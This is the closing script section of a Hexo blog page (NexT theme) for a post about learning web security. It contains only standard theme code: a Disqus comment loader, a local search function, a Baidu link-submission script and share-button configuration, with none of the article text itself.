  <script src="/js/utils.js?v=7.1.0"></script>

  <script src="/js/motion.js?v=7.1.0"></script>



  
  


  <script src="/js/affix.js?v=7.1.0"></script>

  <script src="/js/schemes/pisces.js?v=7.1.0"></script>




  
  <script src="/js/scrollspy.js?v=7.1.0"></script>
<script src="/js/post-details.js?v=7.1.0"></script>



  


  <script src="/js/next-boot.js?v=7.1.0"></script>


  

  

  
  
  

  

  
  
  


  
  

<script>
  var disqus_config = function() {
    this.page.url = "https://willv.cn/2020/05/11/web-security-start/";
    this.page.identifier = "2020/05/11/web-security-start/";
    this.page.title = '安全咋学啊，搞不懂啊';
    };
  function loadComments() {
    var d = document, s = d.createElement('script');
    s.src = 'https://wwillv.disqus.com/embed.js';
    s.setAttribute('data-timestamp', '' + +new Date());
    (d.head || d.body).appendChild(s);
  }
  
    $(function() {
      var offsetTop = $('#comments').offset().top - $(window).height();
      if (offsetTop <= 0) {
        // load directly when there's no a scrollbar
        loadComments();
      } else {
        $(window).on('scroll.disqus_scroll', function() {
          // offsetTop may changes because of manually resizing browser window or lazy loading images.
          var offsetTop = $('#comments').offset().top - $(window).height();
          var scrollTop = $(window).scrollTop();

          // pre-load comments a bit? (margin or anything else)
          if (offsetTop - scrollTop < 60) {
            $(window).off('.disqus_scroll');
            loadComments();
          }
        });
      }
    });
  
</script>





  
    

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/disqusjs@1/dist/disqusjs.css">



<script src="//cdn.jsdelivr.net/npm/disqusjs@1/dist/disqus.js"></script>

<script>
  var dsqjs = new DisqusJS({
    api: 'https://disqus.skk.moe/disqus/' || 'https://disqus.com/api/',
    apikey: 'BOmm2MYh9jOZ82WCk1flJ5KDNWQWEyyQH0YKHEgJ1wqWW4zTuHFxlOOlmgreU34u',
    shortname: 'wwillv'
  });
</script>

  


  
  <script>
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url).replace(/\/{2,}/g, '/');
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x"></i></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x"></i></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  

  

  
  <script>
    (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      bp.src = (curProtocol === 'https') ? 'https://zz.bdstatic.com/linksubmit/push.js' : 'http://push.zhanzhang.baidu.com/push.js';
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>


  

  
  
  
  <script src="/lib/needsharebutton/needsharebutton.js"></script>
  <script>
    
      pbOptions = {};
      
        pbOptions.iconStyle = "box";
      
        pbOptions.boxForm = "horizontal";
      
        pbOptions.position = "bottomCenter";
      
        pbOptions.networks = "Weibo,Wechat,QQZone,Twitter,Facebook,GooglePlus,Tumblr,Evernote";
      
      new needShareButton('#needsharebutton-postbottom', pbOptions);
    
    
  </script>


  

  

  

  

  

  

</body>
</html>
